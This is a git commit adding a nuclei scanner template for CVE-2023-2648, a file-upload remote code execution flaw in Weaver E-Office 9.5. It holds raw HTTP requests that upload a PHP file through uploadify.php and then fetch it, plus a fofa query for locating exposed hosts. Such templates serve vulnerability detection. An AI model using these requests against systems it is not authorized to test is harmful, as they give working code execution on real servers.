Merge pull request #8159 from projectdiscovery/CVE-2023-2648

Create CVE-2023-2648.yaml
2023-09-05 19:04:15 +05:30 · 2023-09-05 19:04:15 +05:30 · fd1234328e
parent 3e9e60b453 b8b9e7b92b
commit fd1234328e
1 changed files with 64 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-2648.yaml
+++ b/http/cves/2023/CVE-2023-2648.yaml
@ -0,0 +1,64 @@
+id: CVE-2023-2648
+
+info:
+  name: Weaver E-Office 9.5 - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
+  reference:
+    - https://github.com/sunyixuan1228/cve/blob/main/weaver.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-2648
+  classification:
+    cve-id: CVE-2023-2648
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-434
+  metadata:
+    max-request: 2
+    verified: true
+    fofa-query: app="泛微-EOffice"
+  tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce
+
+variables:
+  file: '{{rand_base(5, "abc")}}'
+
+http:
+  - raw:
+      - |
+        POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+        Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
+        Content-Type: image/jpeg
+
+        <?php echo md5('CVE-2023-2648');?>
+        ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+
+      - |
+        POST /attachment/{{name}}/{{file}}.php  HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "747711c62dffae7dbf726d8241bd07fe"
+
+      - type: status
+        part: body_2
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: name
+        part: body
+        group: 1
+        regex:
+          - "([0-9]+)"
+        internal: true